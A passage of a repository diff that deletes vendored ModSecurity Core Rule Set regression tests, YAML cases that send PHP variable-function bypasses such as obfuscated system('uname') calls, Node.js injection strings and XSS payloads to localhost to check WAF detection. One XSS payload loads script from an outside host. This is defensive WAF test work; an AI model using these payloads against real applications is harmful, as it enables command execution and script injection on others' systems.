dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29'
output:
log_contains: id "933180"
- test_title: 933180-15
desc: $GLOBALS['cf908275'](14)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29'
output:
log_contains: id "933180"
- test_title: 933180-16
desc: $OOO000000{0}(15)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'c=%24OOO000000%7B0%7D%2815%29'
output:
log_contains: id "933180"
- test_title: 933180-17
desc: $OOO0000O0 (16)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24OOO0000O0%20%2816%29'
output:
log_contains: id "933180"
- test_title: 933180-18
desc: $_aB_4c[5]['d'] /*lol*/ (17)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24_aB_4c%5B5%5D%5B%27d%27%5D%20%2F%2Alol%2A%2F%20%2817%29'
output:
log_contains: id "933180"
- test_title: 933180-19
desc: $_aB_4c[@5]/*wat*/[@d] (18)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29'
output:
log_contains: id "933180"
- test_title: 933180-20
desc: $_aB_4c/*foo*/[@5]/*bar*/[@d]/*baz*/(19)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29'
output:
log_contains: id "933180"
- test_title: 933180-21
desc: $___[@-_](20)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24___%5B%40-_%5D%2820%29'
output:
log_contains: id "933180"
- test_title: 933180-22
desc: '@$___[@!+_](21)'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%40%24___%5B%40%21%2B_%5D%2821%29
output:
log_contains: id "933180"
- test_title: 933180-23
desc: $b374k=@$s_func(22)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24b374k%3D%40%24s_func%2822%29'
output:
log_contains: id "933180"
- test_title: 933180-24
desc: $function\r\n (23)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: 'foo=%24function%0D%0A%20%2823%29'
output:
log_contains: id "933180"
- test_title: 933180-25
desc: $__[_](24)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24__%5B_%5D%2824%29'
output:
log_contains: id "933180"
- test_title: 933180-26
desc: $____[_]{_}[@_](25)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: '/?x=%24____%5B_%5D%7B_%7D%5B%40_%5D%2825%29'
output:
log_contains: id "933180"
- test_title: 933180-27
desc: multiline with comments
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29
output:
log_contains: id "933180"
- test_title: 933180-30
desc: $$$z(29)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%24%24z%2829%29
output:
log_contains: id "933180"
- test_title: 933180-31
desc: ${_.__}(30);
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%7B_.__%7D%2830%29%3B
output:
log_contains: id "933180"
- test_title: 933180-32
desc: $ {@_.__}(31);
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%20%7B%40_.__%7D%2831%29%3B
output:
log_contains: id "933180"
- test_title: 933180-33
desc: $_[@-_]($_[@!+_] )
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24_%5B%40-_%5D%28%24_%5B%40%21%2B_%5D%20%29
output:
log_contains: id "933180"
- test_title: 933180-34
desc: $f(101).$f(120)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24f%28101%29.%24f%28120%29
output:
log_contains: id "933180"
- test_title: 933180-35
desc: '@$b374k("foo")'
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%40%24b374k%28%22foo%22%29
output:
log_contains: id "933180"
- test_title: 933180-36
desc: ${$foo->bar}(200)
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%24%7B%24foo-%3Ebar%7D%28200%29
output:
log_contains: id "933180"
- test_title: 933180-37
desc: $foo->$funcname()
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /
data: '%24foo-%3E%24funcname%28%29'
output:
log_contains: id "933180"
- test_title: 933180-38
desc: Foo::$variable()
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=Foo%3A%3A%24variable%28%29
output:
log_contains: id "933180"

215
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml vendored
View file

@ -1,215 +0,0 @@
---
meta:
author: theMiddle
description: Test for "933210" PHP Variable Function bypass
enabled: true
name: 933210.yaml
tests:
- test_title: 933210-1
desc: Check for false positive 1
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29.
output:
no_log_contains: id "933210"
- test_title: 933210-2
desc: Check for false positive 2
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d
output:
no_log_contains: id "933210"
- test_title: 933210-3
desc: PHP Variable Function bypass "(system)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28system%29%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-4
desc: PHP Variable Function bypass "(sy.(st).em)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28sy.%28st%29.em%29%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-5
desc: PHP Variable Function bypass "(string)'system'('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28string%29%22system%22%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-6
desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-7
desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-8
desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-9
desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-10
desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-11
desc: PHP Variable Function bypass "(system)(ls)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28system%29%28ls%29
output:
log_contains: id "933210"
- test_title: 933210-12
desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29
output:
log_contains: id "933210"
- test_title: 933210-13
desc: PHP Variable Function bypass "[system][0](ls)"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5bsystem%5d%5b0%5d%28ls%29
output:
log_contains: id "933210"
- test_title: 933210-14
desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29
output:
log_contains: id "933210"
- test_title: 933210-15
desc: PHP Variable Function bypass "(['system'])[0]('uname')"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29
output:
log_contains: id "933210"
- test_title: 933210-16
desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )"
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
port: 80
uri: /?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29
output:
log_contains: id "933210"

135
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-NODEJS/934100.yaml vendored
View file

@ -1,135 +0,0 @@
---
meta:
author: "lifeforms"
enabled: true
name: "934100.yaml"
description: "Tests for rule 934100"
tests:
- test_title: 934100-0
desc: imported test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=_%24%24ND_FUNC%24%24_
version: HTTP/1.0
output:
log_contains: id "934100"
- test_title: 934100-1
desc: imported test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=__js_function
version: HTTP/1.0
output:
log_contains: id "934100"
- test_title: 934100-2
desc: imported test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=eval%28String.fromCharCode
version: HTTP/1.0
output:
log_contains: id "934100"
- test_title: 934100-3
desc: imported test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=function%28%29+%7B
version: HTTP/1.0
output:
log_contains: id "934100"
- test_title: 934100-4
desc: imported test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=new+Function+%28
version: HTTP/1.0
output:
log_contains: id "934100"
- test_title: 934100-5
desc: imported test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=this.constructor.constructor
version: HTTP/1.0
output:
log_contains: id "934100"
- test_title: 934100-6
desc: imported test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=module.exports%3D
version: HTTP/1.0
output:
log_contains: id "934100"
- test_title: 934100-7
desc: base64 encoded test
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: "*/*"
Host: localhost
User-Agent: ModSecurity CRS 3 Tests
method: GET
port: 80
uri: /?foo=XyQkTkRfRlVOQyQkXwo=
version: HTTP/1.0
output:
log_contains: id "934100"

79
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml vendored
View file

@ -1,79 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "941100.yaml"
description: "Tests to trigger, or not trigger 941100"
tests:
- test_title: 941100-1
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941100"
- test_title: 941100-2
desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
log_contains: id "941100"
- test_title: 941100-3
desc: XSS testing of libinjection in User-Agent
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: '/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E'
Host: localhost
output:
log_contains: id "941100"
- test_title: 941100-4
desc: XSS testing of libinjection in User-Agent
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Referer: http://www.cnn.com
Host: localhost
output:
no_log_contains: id "941100"
- test_title: 941100-5FN
desc: XSS testing of libinjection in User-Agent
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Referer: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
Host: localhost
output:
no_log_contains: id "941100"

21
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml vendored
View file

@ -1,21 +0,0 @@
---
meta:
author: "4v3r9"
enabled: true
name: "941101.yaml"
description: "Test to trigger 941101"
tests:
- test_title: 941101-1
stages:
- stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: /
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
Referer: www.github.com<script><img><iframe>
output:
log_contains: id "941101"

Some files were not shown because too many files have changed in this diff Show more